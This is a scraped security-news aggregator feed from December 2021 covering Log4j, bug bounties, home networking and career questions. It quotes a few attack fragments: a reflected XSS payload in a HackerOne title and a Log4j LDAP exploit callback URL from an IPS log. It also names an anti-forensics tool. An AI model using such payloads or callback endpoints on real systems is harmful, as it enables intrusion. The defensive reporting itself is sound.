    Hello everyone, soon I will be moving out of my parents' house, and I'm interested in the topic of home networking, security and privacy. Here are my plans: currently, for the last 4 years, I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remotely via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows; also, if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with separate SSIDs that won't communicate between each other (basically what I'm asking is, is it possible to have separate networks for guests and me)? I would have some IoT devices such as a smart TV, but is it possible to filter it out in ACL so that the TV only has LAN but can't connect to the internet? Since I'm moving out it will be a great learning experience to make my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for? Which model is the best, should I go for OpenWRT? Should I get a L3 switch? If so, what model would be the best? Is it possible to separate my home network into smaller ones that won't communicate between each other (guest, my personal and IoT LAN devices)? Well, that's all the questions I have, thank you in advance. EDIT: I forgot to add this: I would need WiFi, so that means I would need some WiFi Access Points; which models should I look for? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately I have to do one year of military service; I will be 25 1/2 or 26 when I finish. There is a gap between me as an MIS student and CS students. Thankfully it wasn’t as big as I thought. The interviewer liked my Python skills and reverse skills. However, he told me I need to strengthen my networking and web skills and told me to study CompTIA A+ and CompTIA Security. Told me if I want to study malware analysis I should study architecture and OS. The interviewer liked that I am a geek the most part and although it isn’t my major I kept studying security and exploitation. Between the time of my service and now I should start studying networks, web, OS, and architecture. So a couple of questions now. 1- I have an Arduino, can I study OS and architecture from it? 2- He told me to apply again after finishing these courses, but cyber security isn’t demanded in the labor market of my country yet. So I was thinking of working remotely till then, any advice on that? I was thinking of hackthebox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid ?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid ? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that both ports 6666 and 8443 are open. I never used any kind of software related to IRC. I have a laptop running Ubuntu, an Xbox and 2 iPhones on my network. I think the culprit might be my Asus router, as I checked my laptop's firewall setup without any leads. Disabling UPnP doesn’t do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    A Journey Inside Amazon's 5-Star Reviews
    Between intermediaries and data leaks. Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    Research on Attack Attribution Based on Big Data Technology by ourren; Java Code Audit 1: Maven Basics by jinxing. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    forensic image infected analysis
    I would like to ask: what if I got a USB with an image from someone for analysis and I found that the USB is infected? What should I do to start analyzing it (connect it to my lab (FRED), or install my tools on a VM for analysis, or what)? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

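    FreeBuf Morning Post | China's first set of "news digital collectibles" issued; Just Dance user data leaked
    Xinhua News Agency is today issuing China's first set of "news digital collectibles" NFTs.  ( 1 min )
    Analysis of recent attack activity against Bangladesh by the suspected Donot ("肚脑虫") APT group
    Donot ("肚脑虫") is an APT group suspected of having a South Asian background; it mainly targets the governments and militaries of neighboring countries, including Pakistan, Bangladesh, Nepal and Sri Lanka, with cyber attacks.  ( 1 min )
    The "unkillable" "Xuling Miner" (虚灵矿工): analysis report on a Monero mining trojan
    The mining trojan appends a large number of null bytes to the end of its file, inflating it to hundreds of MB, in order to evade detection by antivirus software and sandboxes.  ( 1 min )
    K-12 education apps carry "serious security risks"
    Many applications used in K-12 education have a variety of serious security issues, including ones that could lead to student data being shared with advertising companies in an "unregulated and out-of-control" manner.
    The latest US Hack DHS bug bounty program now covers log4j-related vulnerabilities
    In response to the recently discovered log4j vulnerability, the department is expanding the scope of the Hack DHS bug bounty program, including additional incentives, to find and patch log4j-related vulnerabilities in its systems.  ( 1 min )
    Microsoft Teams vulnerabilities that allow phishing remain unfixed since March
    Microsoft Teams is a chat-based smart team collaboration tool that provides real-time communication features such as document sharing, voice and video conferencing.  ( 1 min )
    Survey shows that in 60% of projects, unpatched software with known vulnerabilities lets attackers penetrate further
    Data from dozens of penetration tests and security assessments shows that almost every organization can be penetrated by cyber attackers.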
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do u have to be an expert in other things like web security/pen testing for example. I enjoy doing reversing and finding bugs and exploiting them(still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I’ve always found those pretty boring and I never really enjoy the process as much as I do from reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I’m not laser focused into getting a job in this field as I’m still a software engineer and do this as a hobby but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )

  • Open

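    Restricting ZAP and Burpsuite from collecting feedback information
    Callhome, one of ZAP's core add-ons, was recently updated. Callhome was originally a feature built simply to show News on the main screen, but this update added a Telemetry component. Telemetry is a feature for collecting ZAP usage information; according to the ZAP team's description, it does not collect vulnerabilities or personal information, only simple statistics. Either way, people like me who are sensitive about this kind of data collection will probably need to disable it separately. (Burpsuite has done this for a long time… 😱) Today, while I'm at it, I'll write up why ZAP and Burpsuite collect this usage information and how to disable it.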
  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making bootable Caine OS usb from rufus and balena etcher, none of them were bootable, how do you fix missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot Caineos from usb
    just downloaded caine os, but caine11.0.iso does not have a boot file computer boots into black screen when booting from usb submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    is the Acronis vulnerability scan reliable? it detects my docker, python, apple music have vulnerability. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I’m going to share some tips on how to become a successful bug hunter. I´m Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello ! ​ I am currently applying (learning purpose) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ ​ However i m unable to reproduce the same behavior and get a shell... ​ I m currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. ​ I m a beginner and don't feel comfortable with some points: - does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...). - Moreover "Leak scanf" has a strange value interpreted as string "JHmp" - Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh ? - When invoking "Leak system" with "SHELL=/bin/bash" does it work with prefix "SHELL=" ? Or need another string ? - In comments someone said he had an issue with scanf interpreting space 0x20 but after checking address I think I m not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error ? ​ Could you help me to understand why it doesn't work ? I have attached screenshots with values of the stack, registers, etc to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip") ​ Many thanks !! ​ Update: ​ I have updated my libc and it works fine now... Still don't understand why it didn't work before. ​ Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, Would like a quick opinion- suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my macbook for any access events or really anything at all just in case and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like reference to some update and looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my macbook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my macbook? Or otherwise, any idea what these console events could be regarding? I am already working with US secret service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    A cloud security vendor, Wiz.io discovered a four years old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service, when users use the “Local Git” deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk for information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft and the company added a “web.config” file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What are threads can identify on packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying about Linux systems in University now. And I'm pretty confused if Linux and UNIX are two different entities cuz my college professor seems to use these terms interchangeably and creating all this massive chaos between these two lol. So I did some research at my own to see the difference but the results were quite confusing at first glance, so now I want yall to give me correct answer, are they both same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur wont let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive after so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formating the drive will be enough. I've heard of DBAN but it seems more for internal drive and I'm paranoid that might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello Everyone, I am requesting you to fill this survey. it will help me to archive my final year research project. this project is based on developing network streaming analytics in nearly real-time with IoT devices. link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17 [link] [comments]
    help a newbie understand what's happening with https & SSL/TLS question.
    Hello all, I'm a little confused on https and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used letsencyrpt ssl certs when adding the host to my proxy manager. In Cloudflare I'm using full SSL/TLS encrypt setting. When I go to my service outside of my network it says not secure in the toolbar. I asked this question in another sub and was told it was okay. but I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? ​ The service does work over https but it also wants me to point it to the PKCS #12 file. I download the certs from proxy manager and not sure what file to actually upload. I can get help on this question in that services sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500 [link] [comments]  ( 1 min )
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior level IT execs just trying to sell a product. But I learn that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it?Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? Of yes, what event(s)? submitted by /u/gnomeparadox [link] [comments]  ( 5 min )
  • Open

    On Writing DFIR Books, pt III
    Editing and Feedback When it comes to writing books, having someone can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…  ( 6 min )
  • Open

    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz [link] [comments]
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder [link] [comments]
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm [link] [comments]
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu [link] [comments]
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius [link] [comments]
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus [link] [comments]  ( 1 min )
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    No news updates yet today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

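    FreeBuf Morning Post | Dark web market 2easy is dumping stolen data; Joker malware downloaded 500,000 times
    Security researchers have found that a dark web marketplace called "2easy" is dumping large amounts of data stolen from about 600,000 infected devices.  ( 1 min )
    Silicon Valley's new get-rich-quick job: crypto startups
    More people are drawn by the spirit of Web3, seeking the decentralization of power and decision-making.  ( 1 min )
    Livestream recap | The CIS 2021 Spring Edition topic preview livestream continues, see you there
    On the longest night of the year, the winter solstice, nearly ten thousand people stayed in the FreeBuf livestream room to watch the CIS 2021 Spring Edition topic preview livestream.  ( 1 min )
    What should enterprises do when a vulnerability crisis breaks out?
    For security vulnerability incidents, the state has a detailed set of laws and regulations that require the companies concerned to "report as early as possible" and to help enterprises and institutions in related industries "patch" promptly.
    Understanding Stack-migration in one article
    Understanding Stack-migration in one article.  ( 2 min )
    Practical skills: several common methods for troubleshooting domain name resolution failures
    DNS domain name resolution is one of the key steps in accessing a website.
    Dell BIOS updates may leave computers unable to boot normally
    BIOS updates recently released by Dell are causing serious boot problems on multiple laptop and desktop models.  ( 1 min )
    Full text released: "Shanghai Action Plan for Building a Cybersecurity Industry Innovation Hub (2021-2023)"
    Overall, the Action Plan sets out 4 main goals, 3 major hubs to build, 10 construction tasks and 7 safeguard measures.
    Security knowledge graphs | Mapping a software supply chain knowledge graph to strengthen risk analysis
    The seventh installment of the highlights series on "Practicing Security Knowledge Graphs, Moving Together Toward Cognitive Intelligence" describes how knowledge-graph technologies are applied in software supply chain security.  ( 1 min )
    The state of enterprise IoT/OT network security
    In 2021 there were several high-profile cyber attacks on network devices, surveillance systems, pipelines and water treatment facilities, making the need for major improvements in IoT/OT network security more apparent.  ( 1 min )
    TikTok Live Studio uses OBS source code in violation of the GPL
    Recently, Twitter users claimed that TikTok's newly launched software TikTok Live Studio appears to use source code from OBS (Open broadcasting Software) without complying with the relevant open-source license terms.  ( 1 min )
    Google warns that more than 35,000 Java packages are affected by the Log4j vulnerabilities
    Google scanned the Maven Central Java package repository and found 35,863 packages using Log4j library versions vulnerable to the Log4Shell vulnerability.  ( 1 min )
    DNS Flood attack types: a review of attack and defense, with reflections
    Focuses on explaining the attack principles and protection principles, and offers a reference for how to test.  ( 1 min )
    SIP protocol message attacks and defense
    Attack principle: SIP (Session Initiation Protocol) is an application-layer signaling control protocol used to create, modify and release sessions with one or more participants. These sessions can be Internet multimedia conferences, IP telephony or multimedia  ( 1 min )
    FreeBuf Morning Post | Alibaba Cloud suspended as a partner of the MIIT cybersecurity threat information sharing platform; Morgan fined 200 million USD over employees' use of encrypted apps
    There is no shortage of trouble around the world. FreeBuf Morning Post: know your security news early.  ( 1 min )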
  • Open

    Google search tips: keywords alone are not enough, use these 7 techniques to strengthen your search skills
    References: https://support.google.com/websearch/answer/2466433 Continue reading on Medium »
  • Open

    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone Continue reading on Medium »  ( 2 min )

  • Open

    Can you recommend any tool for packet sniffing with the ability to filter traffic by processes?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL, TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo [link] [comments]  ( 1 min )
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
    How do you curate the learning resources out there for cybersecurity?
    As a cybersecurity professional we always keep learning new things. The best part of the internet is that there's free and paid fees out there and there are many options. The worst part is also that there are so many option. So how to do curate if a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe to see what fits but now I'm overwhelmed where to start because there are too many good resources. submitted by /u/writerlyhacker [link] [comments]  ( 1 min )
    Incident handling/response certs?
    have mixed feelings about certifications providing any real value but we have funds for a cert and I’m hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey, curious if anyone has any they would recommend. submitted by /u/freeridevt [link] [comments]  ( 1 min )
    Will attack such as LLMNR, NBT-NS and MDNS poisoner cause any issue to internal network?
    I've seen these kinds of attacks are pretty common in any internal pentest tutorial. But is this safe? Will it cause any issue to customer's network? submitted by /u/w0lfcat [link] [comments]  ( 1 min )
    What is the best way to log DNS when DoH is used?
    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea for the DNS name? The only sources I know are: Domain names extracted from SSL certificates Autonomous System lookups combined with maybe port number Manual DNS lookups I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit [link] [comments]  ( 1 min )
    Guys I recently download some photorecover apps and I'm scared that they might have stolen my photos
    Are most google play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    ModSecurity: Add custom error page or header to blocked requests
    Hi, Using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (or is it using the Ingress settings?) submitted by /u/QuickWin1 [link] [comments]  ( 1 min )
  • Open

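    [Security Advisory] Apache HTTP Server fixes multiple security vulnerabilities (CVE-20...
    Recently, Apache HTTP Server released a security update fixing, in Apache HTTP Server, server-side request forgery (SSRF) and buffer...  ( 1 min )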
  • Open

    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0  ( 3 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Network Security Trends: August-October 2021
    Network attacks observed August-October 2021 included high levels of cross-site scripting, code execution and directory traversal. The post Network Security Trends: August-October 2021 appeared first on Unit42.
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 2 min )
    Hook Heaps and Live Free
    submitted by /u/jat0369 [link] [comments]
    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus [link] [comments]  ( 2 min )
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea [link] [comments]
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2 [link] [comments]  ( 4 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0  ( 6 min )
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0  ( 1 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1  ( 3 min )
  • Open

    SecWiki News 2021-12-21 Review
